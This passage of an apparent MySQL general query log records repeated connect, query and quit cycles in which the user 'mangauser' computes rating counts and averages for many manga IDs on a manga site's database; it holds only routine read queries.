count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330661667 Quit 330661668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330661668 Quit 330661669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330661669 Quit 330661670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330661670 Quit 330661671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330661671 Quit 330661672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330661672 Quit 330661673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330661673 Quit 330661674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330661674 Quit 330661675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330661675 Quit 330661676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330661676 Quit 330661677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330661677 Quit 330661678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330661678 Quit 330661679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330661679 Quit 330661680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330661680 Quit 330661681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330661681 Quit 330661682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330661682 Quit 330661683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330661683 Quit 330661684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330661684 Quit 330661685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330661685 Quit 330661686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330661686 Quit 330661687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330661687 Quit 330661688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330661688 Quit 330661689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330661689 Quit 330661690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330661690 Quit 330661691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330661691 Quit 330661692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330661692 Quit 330661693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330661693 Quit 330661694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330661694 Quit 330661695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330661695 Quit 330661696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330661696 Quit 330661697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330661697 Quit 330661698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330661698 Quit 330661699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330661699 Quit 330661700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330661700 Quit 330661701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330661701 Quit 330661702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330661702 Quit 330661703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330661703 Quit 330661704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330661704 Quit 330661705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330661705 Quit 330661706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330661706 Quit 330661707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330661707 Quit 330661708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330661708 Quit 330661709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330661709 Quit 330661710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330661710 Quit 330661711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330661711 Quit 330661712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330661712 Quit 330661713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330661713 Quit 330661714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330661714 Quit 330661715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330661715 Quit 330661716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330661716 Quit 330661717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330661717 Quit 330661718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330661718 Quit 330661719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330661719 Quit 330661720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330661720 Quit 330661721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330661721 Quit 330661722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330661722 Quit 330661723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330661723 Quit 330661724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330661724 Quit 330661725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330661725 Quit 330661726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330661726 Quit 330661727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330661727 Quit 330661728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330661728 Quit 330661729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330661729 Quit 330661730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330661730 Quit 330661731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330661731 Quit 330661732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330661732 Quit 330661733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330661733 Quit 330661734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330661734 Quit 330661735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330661735 Quit 330661736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330661736 Quit 330661737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330661737 Quit 330661738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330661738 Quit 330661739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330661739 Quit 330661740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330661740 Quit 330661741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330661741 Quit 330661742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330661742 Quit 330661743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330661743 Quit 330661744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330661744 Quit 330661745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330661745 Quit 330661746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330661746 Quit 330661747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330661747 Quit 330661748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330661748 Quit 330661749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330661749 Quit 330661750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330661750 Quit 330661751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330661751 Quit 330661752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330661752 Quit 330661753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330661753 Quit 330661754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330661754 Quit 330661755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330661755 Quit 330661756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330661756 Quit 330661757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330661757 Quit 330661758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330661758 Quit 330661759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330661759 Quit 330661760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330661760 Quit 330661761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330661761 Quit 330661762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330661762 Quit 330661763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330661763 Quit 330661764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330661764 Quit 330661765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330661765 Quit 330661766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330661766 Quit 330661767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330661767 Quit 330661768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330661768 Quit 330661769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330661769 Quit 330661770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330661770 Quit 330661771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330661771 Quit 330661772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330661772 Quit 330661773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330661773 Quit 330661774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330661774 Quit 330661775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330661775 Quit 330661776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330661776 Quit 330661777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330661777 Quit 330661778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330661778 Quit 330661779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330661779 Quit 330661780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330661780 Quit 330661781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330661781 Quit 330661782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330661782 Quit 330661783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330661783 Quit 330661784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330661784 Quit 330661785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330661785 Quit 330661786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330661786 Quit 330661787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330661787 Quit 330661788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330661788 Quit 330661789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330661789 Quit 330661790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330661790 Quit 330661791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330661791 Quit 330661792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330661792 Quit 330661793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330661793 Quit 330661794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330661794 Quit 330661795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330661795 Quit 330661796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330661796 Quit 330661797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330661797 Quit 330661798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330661798 Quit 330661799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330661799 Quit 330661800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330661800 Quit 330661801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330661801 Quit 330661802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330661802 Quit 330661803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330661803 Quit 330661804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330661804 Quit 330661805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330661805 Quit 330661806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330661806 Quit 330661807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330661807 Quit 330661808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330661808 Quit 330661809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330661809 Quit 330661810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330661810 Quit 330661811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330661811 Quit 330661812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330661812 Quit 330661813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330661813 Quit 330661814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330661814 Quit 330661815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330661815 Quit 330661816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330661816 Quit 330661817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330661817 Quit 330661818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330661818 Quit 330661819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330661819 Quit 330661820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661820 Query select count(id) as total_rating, (sum(rating) / count(id)) 